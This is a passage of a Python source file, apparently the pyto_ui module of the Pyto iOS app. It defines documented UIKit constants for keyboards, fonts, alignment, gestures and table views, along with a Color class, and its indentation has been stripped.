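.. highlight:: python
.. code-block:: python
    import pyto_ui as ui

    def button_pressed(sender: ui.Button):
        sender.title = "Pressed!"

    view = ui.View()
    view.background_color = ui.COLOR_SYSTEM_BACKGROUND

    button = ui.Button()
    button.title = "Press me"
    # Set the property to a function instead of overriding a method.
    button.action = button_pressed
    view.add_subview(button)

    ui.show_view(view)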
"""
from __future__ import annotations
from UIKit import UIFont as __UIFont__, UIImage as UIImage
from typing import List, Callable, Tuple
from pyto import __Class__, ConsoleViewController, PyAlert as __PyAlert__
from time import sleep
from io import BytesIO
from threading import Thread
import os
import sys
import base64
import threading
import _values
import ui_constants
import builtins
try:
from rubicon.objc import ObjCClass, CGFloat
except ValueError:
def ObjCClass(class_name):
return None
if "widget" not in os.environ:
from urllib.request import urlopen
try:
from PIL import Image
except ImportError:
pass
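# __v__ wraps a constant's *name* so it can be used as a default argument value and
# detected later by string comparison (e.g. ButtonItem.__init__ replaces
# __v__("BUTTON_ITEM_STYLE_PLAIN") with the real constant at call time).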
class __v__:
def __init__(self, string):
self.s = string
def __eq__(self, other):
return other == self.s
def __repr__(self):
return self.s
#############################
# MARK: - Objective-C Classes
#############################
__PyView__ = __Class__("PyView")
__PyControl__ = __Class__("PyControl")
__PySlider__ = __Class__("PySlider")
__PySegmentedControl__ = __Class__("PySegmentedControl")
__PySwitch__ = __Class__("PySwitch")
__PyButton__ = __Class__("PyButton")
__PyLabel__ = __Class__("PyLabel")
__UIImageView__ = __Class__("PyImageView")
__PyTextView__ = __Class__("PyTextView")
__PyTextField__ = __Class__("PyTextField")
__PyTableView__ = __Class__("PyTableView")
__PyTableViewCell__ = __Class__("PyTableViewCell")
__PyTableViewSection__ = __Class__("PyTableViewSection")
__PyWebView__ = __Class__("PyWebView")
__PyGestureRecognizer__ = __Class__("PyGestureRecognizer")
__PyColor__ = __Class__("PyColor")
__PyButtonItem__ = __Class__("PyButtonItem")
__PyTextInputTraitsConstants__ = __Class__("PyTextInputTraitsConstants")
try:
__NSData__ = ObjCClass("NSData")
except NameError:
pass
###################
# MARK: - Constants
###################
# MARK: - Gesture Recognizer Type
GESTURE_TYPE = ui_constants.GESTURE_TYPE
GESTURE_TYPE_LONG_PRESS = ui_constants.GESTURE_TYPE_LONG_PRESS
"""
A long press gesture.
"""
GESTURE_TYPE_PAN = ui_constants.GESTURE_TYPE_PAN
"""
A dragging gesture.
"""
GESTURE_TYPE_TAP = ui_constants.GESTURE_TYPE_TAP
"""
A tap gesture.
"""
# MARK: - Keyboard Appearance
KEYBOARD_APPEARANCE = ui_constants.KEYBOARD_APPEARANCE
KEYBOARD_APPEARANCE_DEFAULT = ui_constants.KEYBOARD_APPEARANCE_DEFAULT
"""
Specifies the default keyboard appearance for the current input method.
"""
KEYBOARD_APPEARANCE_LIGHT = ui_constants.KEYBOARD_APPEARANCE_LIGHT
"""
Specifies a keyboard appearance suitable for a light UI look.
"""
KEYBOARD_APPEARANCE_DARK = ui_constants.KEYBOARD_APPEARANCE_DARK
"""
Specifies a keyboard appearance suitable for a dark UI look.
"""
# MARK: - Keyboard Type
KEYBOARD_TYPE = ui_constants.KEYBOARD_TYPE
KEYBOARD_TYPE_DEFAULT = ui_constants.KEYBOARD_TYPE_DEFAULT
"""
Specifies the default keyboard for the current input method.
"""
KEYBOARD_TYPE_ASCII_CAPABLE = ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE
"""
Specifies a keyboard that displays standard ASCII characters.
"""
KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD = (
ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD
)
"""
Specifies a number pad that outputs only ASCII digits.
"""
KEYBOARD_TYPE_DECIMAL_PAD = ui_constants.KEYBOARD_TYPE_DECIMAL_PAD
"""
Specifies a keyboard with numbers and a decimal point.
"""
KEYBOARD_TYPE_EMAIL_ADDRESS = ui_constants.KEYBOARD_TYPE_EMAIL_ADDRESS
"""
Specifies a keyboard optimized for entering email addresses. This keyboard type prominently features the at (“@”), period (“.”) and space characters.
"""
KEYBOARD_TYPE_NAME_PHONE_PAD = ui_constants.KEYBOARD_TYPE_NAME_PHONE_PAD
"""
Specifies a keypad designed for entering a person’s name or phone number. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBER_PAD = ui_constants.KEYBOARD_TYPE_NUMBER_PAD
"""
Specifies a numeric keypad designed for PIN entry. This keyboard type prominently features the numbers 0 through 9. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION = (
ui_constants.KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION
)
"""
Specifies the numbers and punctuation keyboard.
"""
KEYBOARD_TYPE_PHONE_PAD = ui_constants.KEYBOARD_TYPE_PHONE_PAD
"""
Specifies a keypad designed for entering telephone numbers. This keyboard type prominently features the numbers 0 through 9 and the “*” and “#” characters. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_TWITTER = ui_constants.KEYBOARD_TYPE_TWITTER
"""
Specifies a keyboard optimized for Twitter text entry, with easy access to the at (“@”) and hash (“#”) characters.
"""
KEYBOARD_TYPE_URL = ui_constants.KEYBOARD_TYPE_URL
"""
Specifies a keyboard optimized for URL entry. This keyboard type prominently features the period (“.”) and slash (“/”) characters and the “.com” string.
"""
KEYBOARD_TYPE_WEB_SEARCH = ui_constants.KEYBOARD_TYPE_WEB_SEARCH
"""
Specifies a keyboard optimized for web search terms and URL entry. This keyboard type prominently features the space and period (“.”) characters.
"""
# MARK: - Return Key Type
RETURN_KEY_TYPE = ui_constants.RETURN_KEY_TYPE
RETURN_KEY_TYPE_DEFAULT = ui_constants.RETURN_KEY_TYPE_DEFAULT
"""
Specifies that the visible title of the Return key is “return”.
"""
RETURN_KEY_TYPE_CONTINUE = ui_constants.RETURN_KEY_TYPE_CONTINUE
"""
Specifies that the visible title of the Return key is “Continue”.
"""
RETURN_KEY_TYPE_DONE = ui_constants.RETURN_KEY_TYPE_DONE
"""
Specifies that the visible title of the Return key is “Done”.
"""
RETURN_KEY_TYPE_EMERGENCY_CALL = ui_constants.RETURN_KEY_TYPE_EMERGENCY_CALL
"""
Specifies that the visible title of the Return key is “Emergency Call”.
"""
RETURN_KEY_TYPE_GO = ui_constants.RETURN_KEY_TYPE_GO
"""
Specifies that the visible title of the Return key is “Go”.
"""
RETURN_KEY_TYPE_GOOGLE = ui_constants.RETURN_KEY_TYPE_GOOGLE
"""
Specifies that the visible title of the Return key is “Google”.
"""
RETURN_KEY_TYPE_JOIN = ui_constants.RETURN_KEY_TYPE_JOIN
"""
Specifies that the visible title of the Return key is “Join”.
"""
RETURN_KEY_TYPE_NEXT = ui_constants.RETURN_KEY_TYPE_NEXT
"""
Specifies that the visible title of the Return key is “Next”.
"""
RETURN_KEY_TYPE_ROUTE = ui_constants.RETURN_KEY_TYPE_ROUTE
"""
Specifies that the visible title of the Return key is “Route”.
"""
RETURN_KEY_TYPE_SEARCH = ui_constants.RETURN_KEY_TYPE_SEARCH
"""
Specifies that the visible title of the Return key is “Search”.
"""
RETURN_KEY_TYPE_SEND = ui_constants.RETURN_KEY_TYPE_SEND
"""
Specifies that the visible title of the Return key is “Send”.
"""
RETURN_KEY_TYPE_YAHOO = ui_constants.RETURN_KEY_TYPE_YAHOO
"""
Specifies that the visible title of the Return key is “Yahoo”.
"""
# MARK: - Autocapitalization Type
AUTO_CAPITALIZE = ui_constants.AUTO_CAPITALIZE
AUTO_CAPITALIZE_NONE = ui_constants.AUTO_CAPITALIZE_NONE
"""
Specifies that there is no automatic text capitalization.
"""
AUTO_CAPITALIZE_ALL = ui_constants.AUTO_CAPITALIZE_ALL
"""
Specifies automatic capitalization of all characters, such as for entry of two-character state abbreviations for the United States.
"""
AUTO_CAPITALIZE_SENTENCES = ui_constants.AUTO_CAPITALIZE_SENTENCES
"""
Specifies automatic capitalization of the first letter of each sentence.
"""
AUTO_CAPITALIZE_WORDS = ui_constants.AUTO_CAPITALIZE_WORDS
"""
Specifies automatic capitalization of the first letter of each word.
"""
# MARK: - Font Text Style
FONT_TEXT_STYLE = ui_constants.FONT_TEXT_STYLE
FONT_TEXT_STYLE_BODY = ui_constants.FONT_TEXT_STYLE_BODY
"""
The font used for body text.
"""
FONT_TEXT_STYLE_CALLOUT = ui_constants.FONT_TEXT_STYLE_CALLOUT
"""
The font used for callouts.
"""
FONT_TEXT_STYLE_CAPTION_1 = ui_constants.FONT_TEXT_STYLE_CAPTION_1
"""
The font used for standard captions.
"""
FONT_TEXT_STYLE_CAPTION_2 = ui_constants.FONT_TEXT_STYLE_CAPTION_2
"""
The font used for alternate captions.
"""
FONT_TEXT_STYLE_FOOTNOTE = ui_constants.FONT_TEXT_STYLE_FOOTNOTE
"""
The font used in footnotes.
"""
FONT_TEXT_STYLE_HEADLINE = ui_constants.FONT_TEXT_STYLE_HEADLINE
"""
The font used for headings.
"""
FONT_TEXT_STYLE_SUBHEADLINE = ui_constants.FONT_TEXT_STYLE_SUBHEADLINE
"""
The font used for subheadings.
"""
FONT_TEXT_STYLE_LARGE_TITLE = ui_constants.FONT_TEXT_STYLE_LARGE_TITLE
"""
The font style for large titles.
"""
FONT_TEXT_STYLE_TITLE_1 = ui_constants.FONT_TEXT_STYLE_TITLE_1
"""
The font used for first level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_2 = ui_constants.FONT_TEXT_STYLE_TITLE_2
"""
The font used for second level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_3 = ui_constants.FONT_TEXT_STYLE_TITLE_3
"""
The font used for third level hierarchical headings.
"""
# MARK: - Font Size
FONT_SIZE = ui_constants.FONT_SIZE
FONT_LABEL_SIZE = ui_constants.FONT_LABEL_SIZE
"""
Returns the standard font size used for labels.
"""
FONT_BUTTON_SIZE = ui_constants.FONT_BUTTON_SIZE
"""
Returns the standard font size used for buttons.
"""
FONT_SMALL_SYSTEM_SIZE = ui_constants.FONT_SMALL_SYSTEM_SIZE
"""
Returns the size of the standard small system font.
"""
FONT_SYSTEM_SIZE = ui_constants.FONT_SYSTEM_SIZE
"""
Returns the size of the standard system font.
"""
# MARK: - Presentation Mode
PRESENTATION_MODE = ui_constants.PRESENTATION_MODE
PRESENTATION_MODE_SHEET = ui_constants.PRESENTATION_MODE_SHEET
"""
A presentation style that displays the content centered in the screen.
"""
PRESENTATION_MODE_FULLSCREEN = ui_constants.PRESENTATION_MODE_FULLSCREEN
"""
A presentation style in which the presented view covers the screen.
"""
PRESENTATION_MODE_WIDGET = ui_constants.PRESENTATION_MODE_WIDGET
"""
A presentation mode style which simulates a Today Widget. Should be used in app to preview how a widget will look.
"""
# MARK: - Appearance
APPEARANCE = ui_constants.APPEARANCE
APPEARANCE_UNSPECIFIED = ui_constants.APPEARANCE_UNSPECIFIED
"""
An unspecified interface style.
"""
APPEARANCE_LIGHT = ui_constants.APPEARANCE_LIGHT
"""
The light interface style.
"""
APPEARANCE_DARK = ui_constants.APPEARANCE_DARK
"""
The dark interface style.
"""
# MARK: - Auto Resizing
AUTO_RESIZING = ui_constants.AUTO_RESIZING
FLEXIBLE_WIDTH = ui_constants.FLEXIBLE_WIDTH
"""
Resizing performed by expanding or shrinking a view’s width.
"""
FLEXIBLE_HEIGHT = ui_constants.FLEXIBLE_HEIGHT
"""
Resizing performed by expanding or shrinking a view's height.
"""
FLEXIBLE_TOP_MARGIN = ui_constants.FLEXIBLE_TOP_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the top margin.
"""
FLEXIBLE_BOTTOM_MARGIN = ui_constants.FLEXIBLE_BOTTOM_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the bottom margin.
"""
FLEXIBLE_LEFT_MARGIN = ui_constants.FLEXIBLE_LEFT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the left margin.
"""
FLEXIBLE_RIGHT_MARGIN = ui_constants.FLEXIBLE_RIGHT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the right margin.
"""
# MARK: - Content Mode
CONTENT_MODE = ui_constants.CONTENT_MODE
CONTENT_MODE_SCALE_TO_FILL = ui_constants.CONTENT_MODE_SCALE_TO_FILL
"""
The option to scale the content to fit the size of itself by changing the aspect ratio of the content if necessary.
"""
CONTENT_MODE_SCALE_ASPECT_FIT = ui_constants.CONTENT_MODE_SCALE_ASPECT_FIT
"""
The option to scale the content to fit the size of the view by maintaining the aspect ratio. Any remaining area of the view’s bounds is transparent.
"""
CONTENT_MODE_SCALE_ASPECT_FILL = ui_constants.CONTENT_MODE_SCALE_ASPECT_FILL
"""
The option to scale the content to fill the size of the view. Some portion of the content may be clipped to fill the view’s bounds.
"""
CONTENT_MODE_REDRAW = ui_constants.CONTENT_MODE_REDRAW
"""
The option to redisplay the view when the bounds change by invoking the ``setNeedsDisplay()`` method.
"""
CONTENT_MODE_CENTER = ui_constants.CONTENT_MODE_CENTER
"""
The option to center the content in the view’s bounds, keeping the proportions the same.
"""
CONTENT_MODE_TOP = ui_constants.CONTENT_MODE_TOP
"""
The option to center the content aligned at the top in the view’s bounds.
"""
CONTENT_MODE_BOTTOM = ui_constants.CONTENT_MODE_BOTTOM
"""
The option to center the content aligned at the bottom in the view’s bounds.
"""
CONTENT_MODE_LEFT = ui_constants.CONTENT_MODE_LEFT
"""
The option to align the content on the left of the view.
"""
CONTENT_MODE_RIGHT = ui_constants.CONTENT_MODE_RIGHT
"""
The option to align the content on the right of the view.
"""
CONTENT_MODE_TOP_LEFT = ui_constants.CONTENT_MODE_TOP_LEFT
"""
The option to align the content in the top-left corner of the view.
"""
CONTENT_MODE_TOP_RIGHT = ui_constants.CONTENT_MODE_TOP_RIGHT
"""
The option to align the content in the top-right corner of the view.
"""
CONTENT_MODE_BOTTOM_LEFT = ui_constants.CONTENT_MODE_BOTTOM_LEFT
"""
The option to align the content in the bottom-left corner of the view.
"""
CONTENT_MODE_BOTTOM_RIGHT = ui_constants.CONTENT_MODE_BOTTOM_RIGHT
"""
The option to align the content in the bottom-right corner of the view.
"""
# MARK: - Horizontal Alignment
HORZONTAL_ALIGNMENT = ui_constants.HORZONTAL_ALIGNMENT
HORZONTAL_ALIGNMENT_CENTER = ui_constants.HORZONTAL_ALIGNMENT_CENTER
"""
Aligns the content horizontally in the center of the control.
"""
HORZONTAL_ALIGNMENT_FILL = ui_constants.HORZONTAL_ALIGNMENT_FILL
"""
Aligns the content horizontally to fill the content rectangles; text may wrap and images may be stretched.
"""
HORZONTAL_ALIGNMENT_LEADING = ui_constants.HORZONTAL_ALIGNMENT_LEADING
"""
Aligns the content horizontally from the leading edge of the control.
"""
HORZONTAL_ALIGNMENT_LEFT = ui_constants.HORZONTAL_ALIGNMENT_LEFT
"""
Aligns the content horizontally from the left of the control (the default).
"""
HORZONTAL_ALIGNMENT_RIGHT = ui_constants.HORZONTAL_ALIGNMENT_RIGHT
"""
Aligns the content horizontally from the right of the control.
"""
HORZONTAL_ALIGNMENT_TRAILING = ui_constants.HORZONTAL_ALIGNMENT_TRAILING
"""
Aligns the content horizontally from the trailing edge of the control.
"""
# MARK: - Vertical Alignment
VERTICAL_ALIGNMENT = ui_constants.VERTICAL_ALIGNMENT
VERTICAL_ALIGNMENT_BOTTOM = ui_constants.VERTICAL_ALIGNMENT_BOTTOM
"""
Aligns the content vertically at the bottom in the control.
"""
VERTICAL_ALIGNMENT_CENTER = ui_constants.VERTICAL_ALIGNMENT_CENTER
"""
Aligns the content vertically in the center of the control.
"""
VERTICAL_ALIGNMENT_FILL = ui_constants.VERTICAL_ALIGNMENT_FILL
"""
Aligns the content vertically to fill the content rectangle; images may be stretched.
"""
VERTICAL_ALIGNMENT_TOP = ui_constants.VERTICAL_ALIGNMENT_TOP
"""
Aligns the content vertically at the top in the control (the default).
"""
# MARK: - Button Type
BUTTON_TYPE = ui_constants.BUTTON_TYPE
BUTTON_TYPE_SYSTEM = ui_constants.BUTTON_TYPE_SYSTEM
"""
A system style button, such as those shown in navigation bars and toolbars.
"""
BUTTON_TYPE_CONTACT_ADD = ui_constants.BUTTON_TYPE_CONTACT_ADD
"""
A contact add button.
"""
BUTTON_TYPE_CUSTOM = ui_constants.BUTTON_TYPE_CUSTOM
"""
No button style.
"""
BUTTON_TYPE_DETAIL_DISCLOSURE = ui_constants.BUTTON_TYPE_DETAIL_DISCLOSURE
"""
A detail disclosure button.
"""
BUTTON_TYPE_INFO_DARK = ui_constants.BUTTON_TYPE_INFO_DARK
"""
An information button that has a dark background.
"""
BUTTON_TYPE_INFO_LIGHT = ui_constants.BUTTON_TYPE_INFO_LIGHT
"""
An information button that has a light background.
"""
# MARK: - Text Alignment
TEXT_ALIGNMENT = ui_constants.TEXT_ALIGNMENT
TEXT_ALIGNMENT_LEFT = ui_constants.TEXT_ALIGNMENT_LEFT
"""
Text is visually left aligned.
"""
TEXT_ALIGNMENT_RIGHT = ui_constants.TEXT_ALIGNMENT_RIGHT
"""
Text is visually right aligned.
"""
TEXT_ALIGNMENT_CENTER = ui_constants.TEXT_ALIGNMENT_CENTER
"""
Text is visually center aligned.
"""
TEXT_ALIGNMENT_JUSTIFIED = ui_constants.TEXT_ALIGNMENT_JUSTIFIED
"""
Text is justified.
"""
TEXT_ALIGNMENT_NATURAL = ui_constants.TEXT_ALIGNMENT_NATURAL
"""
Use the default alignment associated with the current localization of the app. The default alignment for left-to-right scripts is left, and the default alignment for right-to-left scripts is right.
"""
# MARK: - Line Break Mode
LINE_BREAK_MODE = ui_constants.LINE_BREAK_MODE
LINE_BREAK_MODE_BY_WORD_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_WORD_WRAPPING
"""
Wrapping occurs at word boundaries, unless the word itself doesn’t fit on a single line.
"""
LINE_BREAK_MODE_BY_CHAR_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_CHAR_WRAPPING
"""
Wrapping occurs before the first character that doesn’t fit.
"""
LINE_BREAK_MODE_BY_CLIPPING = ui_constants.LINE_BREAK_MODE_BY_CLIPPING
"""
Lines are simply not drawn past the edge of the text container.
"""
LINE_BREAK_MODE_BY_TRUNCATING_HEAD = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_HEAD
"""
The line is displayed so that the end fits in the container and the missing text at the beginning of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_TAIL = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_TAIL
"""
The line is displayed so that the beginning fits in the container and the missing text at the end of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE
"""
The line is displayed so that the beginning and end fit in the container and the missing text in the middle is indicated by an ellipsis glyph. This mode is used for single-line layout; using it with multiline text truncates the text into a single line.
"""
# MARK: - Touch Type
TOUCH_TYPE = ui_constants.TOUCH_TYPE
TOUCH_TYPE_DIRECT = ui_constants.TOUCH_TYPE_DIRECT
"""
A touch resulting from direct contact with the screen.
"""
TOUCH_TYPE_INDIRECT = ui_constants.TOUCH_TYPE_INDIRECT
"""
A touch that did not result from contact with the screen.
"""
TOUCH_TYPE_PENCIL = ui_constants.TOUCH_TYPE_PENCIL
"""
A touch from Apple Pencil.
"""
# MARK: - Gesture State
GESTURE_STATE = ui_constants.GESTURE_STATE
GESTURE_STATE_POSSIBLE = ui_constants.GESTURE_STATE_POSSIBLE
"""
The gesture recognizer has not yet recognized its gesture, but may be evaluating touch events. This is the default state.
"""
GESTURE_STATE_BEGAN = ui_constants.GESTURE_STATE_BEGAN
"""
The gesture recognizer has received touch objects recognized as a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_CHANGED = ui_constants.GESTURE_STATE_CHANGED
"""
The gesture recognizer has received touches recognized as a change to a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_ENDED = ui_constants.GESTURE_STATE_ENDED
"""
The gesture recognizer has received touches recognized as the end of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_CANCELLED = ui_constants.GESTURE_STATE_CANCELLED
"""
The gesture recognizer has received touches resulting in the cancellation of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_RECOGNIZED = ui_constants.GESTURE_STATE_RECOGNIZED
"""
The gesture recognizer has received a multi-touch sequence that it recognizes as its gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
# MARK: - Table View Cell Style
TABLE_VIEW_CELL_STYLE = ui_constants.TABLE_VIEW_CELL_STYLE
TABLE_VIEW_CELL_STYLE_DEFAULT = ui_constants.TABLE_VIEW_CELL_STYLE_DEFAULT
"""
A simple style for a cell with a text label (black and left-aligned) and an optional image view.
"""
TABLE_VIEW_CELL_STYLE_SUBTITLE = ui_constants.TABLE_VIEW_CELL_STYLE_SUBTITLE
"""
A style for a cell with a left-aligned label across the top and a left-aligned label below it in smaller gray text.
"""
TABLE_VIEW_CELL_STYLE_VALUE1 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE1
"""
A style for a cell with a label on the left side of the cell with left-aligned and black text; on the right side is a label that has smaller blue text and is right-aligned. The Settings application uses cells in this style.
"""
TABLE_VIEW_CELL_STYLE_VALUE2 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE2
"""
A style for a cell with a label on the left side of the cell with text that is right-aligned and blue; on the right side of the cell is another label with smaller text that is left-aligned and black. The Phone/Contacts application uses cells in this style.
"""
# MARK: - Table View Cell Accessory Type
ACCESSORY_TYPE = ui_constants.ACCESSORY_TYPE
ACCESSORY_TYPE_NONE = ui_constants.ACCESSORY_TYPE_NONE
"""
No accessory view.
"""
ACCESSORY_TYPE_CHECKMARK = ui_constants.ACCESSORY_TYPE_CHECKMARK
"""
A checkmark image.
"""
ACCESSORY_TYPE_DETAIL_BUTTON = ui_constants.ACCESSORY_TYPE_DETAIL_BUTTON
"""
An information button.
"""
ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON = (
ui_constants.ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON
)
"""
An information button and a disclosure (chevron) control.
"""
ACCESSORY_TYPE_DISCLOSURE_INDICATOR = ui_constants.ACCESSORY_TYPE_DISCLOSURE_INDICATOR
"""
A chevron-shaped control for presenting new content.
"""
# MARK: - Table View Style
TABLE_VIEW_STYLE = ui_constants.TABLE_VIEW_STYLE
TABLE_VIEW_STYLE_PLAIN = ui_constants.TABLE_VIEW_STYLE_PLAIN
"""
A plain table view.
"""
TABLE_VIEW_STYLE_GROUPED = ui_constants.TABLE_VIEW_STYLE_GROUPED
"""
A table view whose sections present distinct groups of rows.
"""
# MARK: - Text Field Border Style
TEXT_FIELD_BORDER_STYLE = ui_constants.TEXT_FIELD_BORDER_STYLE
TEXT_FIELD_BORDER_STYLE_NONE = ui_constants.TEXT_FIELD_BORDER_STYLE_NONE
"""
The text field does not display a border.
"""
TEXT_FIELD_BORDER_STYLE_BEZEL = ui_constants.TEXT_FIELD_BORDER_STYLE_BEZEL
"""
Displays a bezel-style border for the text field. This style is typically used for standard data-entry fields.
"""
TEXT_FIELD_BORDER_STYLE_LINE = ui_constants.TEXT_FIELD_BORDER_STYLE_LINE
"""
Displays a thin rectangle around the text field.
"""
TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT = ui_constants.TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT
"""
Displays a rounded-style border for the text field.
"""
# MARK: - Button Item Style
BUTTON_ITEM_STYLE = ui_constants.BUTTON_ITEM_STYLE
BUTTON_ITEM_STYLE_PLAIN = ui_constants.BUTTON_ITEM_STYLE_PLAIN
"""
Glows when tapped. The default item style.
"""
BUTTON_ITEM_STYLE_DONE = ui_constants.BUTTON_ITEM_STYLE_DONE
"""
The style for a done button—for example, a button that completes some task and returns to the previous view.
"""
# MARK: - Button Item System Item
SYSTEM_ITEM = ui_constants.SYSTEM_ITEM
SYSTEM_ITEM_ACTION = ui_constants.SYSTEM_ITEM_ACTION
"""
The system action button.
"""
SYSTEM_ITEM_ADD = ui_constants.SYSTEM_ITEM_ADD
"""
The system plus button containing an icon of a plus sign.
"""
SYSTEM_ITEM_BOOKMARKS = ui_constants.SYSTEM_ITEM_BOOKMARKS
"""
The system bookmarks button.
"""
SYSTEM_ITEM_CAMERA = ui_constants.SYSTEM_ITEM_CAMERA
"""
The system camera button.
"""
SYSTEM_ITEM_CANCEL = ui_constants.SYSTEM_ITEM_CANCEL
"""
The system Cancel button, localized.
"""
SYSTEM_ITEM_COMPOSE = ui_constants.SYSTEM_ITEM_COMPOSE
"""
The system compose button.
"""
SYSTEM_ITEM_DONE = ui_constants.SYSTEM_ITEM_DONE
"""
The system Done button, localized.
"""
SYSTEM_ITEM_EDIT = ui_constants.SYSTEM_ITEM_EDIT
"""
The system Edit button, localized.
"""
SYSTEM_ITEM_FAST_FORWARD = ui_constants.SYSTEM_ITEM_FAST_FORWARD
"""
The system fast forward button.
"""
SYSTEM_ITEM_FLEXIBLE_SPACE = ui_constants.SYSTEM_ITEM_FLEXIBLE_SPACE
"""
Blank space to add between other items. The space is distributed equally between the other items. Other item properties are ignored when this value is set.
"""
SYSTEM_ITEM_ORGANIZE = ui_constants.SYSTEM_ITEM_ORGANIZE
"""
The system organize button.
"""
SYSTEM_ITEM_PAUSE = ui_constants.SYSTEM_ITEM_PAUSE
"""
The system pause button.
"""
SYSTEM_ITEM_PLAY = ui_constants.SYSTEM_ITEM_PLAY
"""
The system play button.
"""
SYSTEM_ITEM_REDO = ui_constants.SYSTEM_ITEM_REDO
"""
The system redo button.
"""
SYSTEM_ITEM_REFRESH = ui_constants.SYSTEM_ITEM_REFRESH
"""
The system refresh button.
"""
SYSTEM_ITEM_REPLY = ui_constants.SYSTEM_ITEM_REPLY
"""
The system reply button.
"""
SYSTEM_ITEM_REWIND = ui_constants.SYSTEM_ITEM_REWIND
"""
The system rewind button.
"""
SYSTEM_ITEM_SAVE = ui_constants.SYSTEM_ITEM_SAVE
"""
The system Save button, localized.
"""
SYSTEM_ITEM_SEARCH = ui_constants.SYSTEM_ITEM_SEARCH
"""
The system search button.
"""
SYSTEM_ITEM_STOP = ui_constants.SYSTEM_ITEM_STOP
"""
The system stop button.
"""
SYSTEM_ITEM_TRASH = ui_constants.SYSTEM_ITEM_TRASH
"""
The system trash button.
"""
SYSTEM_ITEM_UNDO = ui_constants.SYSTEM_ITEM_UNDO
"""
The system undo button.
"""
###############
# MARK: - Other Classes
###############
# MARK: - Color
class Color:
"""
A ``Color`` object represents a color to be displayed on screen.
Example:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
# RGB
black = ui.Color.rgb(0, 0, 0, 1)
# White
white = ui.Color.white(1, 1)
# Dynamic
background = ui.Color.dynamic(light=white, dark=black)
For pre-defined colors, see `Color <constants.html#ui-elements-colors>`_ constants.
"""
__py_color__ = None
def red(self) -> float:
"""
Returns the red value of the color.
:rtype: float
"""
return float(self.__py_color__.red)
def green(self) -> float:
"""
Returns the green value of the color.
:rtype: float
"""
return float(self.__py_color__.green)
def blue(self) -> float:
"""
Returns the blue value of the color.
:rtype: float
"""
return float(self.__py_color__.blue)
def alpha(self) -> float:
"""
Returns the alpha value of the color.
:rtype: float
"""
return float(self.__py_color__.alpha)
def __init__(self, py_color):
self.__py_color__ = py_color
def __repr__(self):
return str(self.__py_color__.managed.description)
@classmethod
def rgb(cls, red: float, green: float, blue: float, alpha: float) -> Color:
"""
Initializes a color from RGB values.
All values should be located between 0 and 1, not between 0 and 255.
:param red: The red value.
:param green: The green value.
:param blue: The blue value.
:param alpha: The opacity value.
:rtype: Color
"""
return cls(__PyColor__.colorWithRed(red, green=green, blue=blue, alpha=alpha))
@classmethod
def white(cls, white: float, alpha: float) -> Color:
"""
Initializes and returns a color from white value.
All values should be located between 0 and 1, not between 0 and 255.
:param white: The grayscale value.
:param alpha: The opacity value.
:rtype: Color
"""
return cls(__PyColor__.colorWithWhite(white, alpha=alpha))
@classmethod
def dynamic(cls, light: Color, dark: Color) -> Color:
"""
Initializes and returns a color that dynamically changes in dark or light mode.
:param light: :class:`~pyto_ui.Color` object to be displayed in light mode.
:param dark: :class:`~pyto_ui.Color` object to be displayed in dark mode.
:rtype: Color
"""
return cls(__PyColor__.colorWithLight(light.__py_color__, dark=dark.__py_color__))
COLOR_LABEL = Color(ui_constants.COLOR_LABEL)
""" The color for text labels containing primary content. """
COLOR_SECONDARY_LABEL = Color(ui_constants.COLOR_SECONDARY_LABEL)
""" The color for text labels containing secondary content. """
COLOR_TERTIARY_LABEL = Color(ui_constants.COLOR_TERTIARY_LABEL)
""" The color for text labels containing tertiary content. """
COLOR_QUATERNARY_LABEL = Color(ui_constants.COLOR_QUATERNARY_LABEL)
""" The color for text labels containing quaternary content. """
COLOR_SYSTEM_FILL = Color(ui_constants.COLOR_SYSTEM_FILL)
""" An overlay fill color for thin and small shapes. """
COLOR_SECONDARY_SYSTEM_FILL = Color(ui_constants.COLOR_SECONDARY_SYSTEM_FILL)
""" An overlay fill color for medium-size shapes. """
COLOR_TERTIARY_SYSTEM_FILL = Color(ui_constants.COLOR_TERTIARY_SYSTEM_FILL)
""" An overlay fill color for large shapes. """
COLOR_QUATERNARY_SYSTEM_FILL = Color(ui_constants.COLOR_QUATERNARY_SYSTEM_FILL)
""" An overlay fill color for large areas containing complex content. """
COLOR_PLACEHOLDER_TEXT = Color(ui_constants.COLOR_PLACEHOLDER_TEXT)
""" The color for placeholder text in controls or text views. """
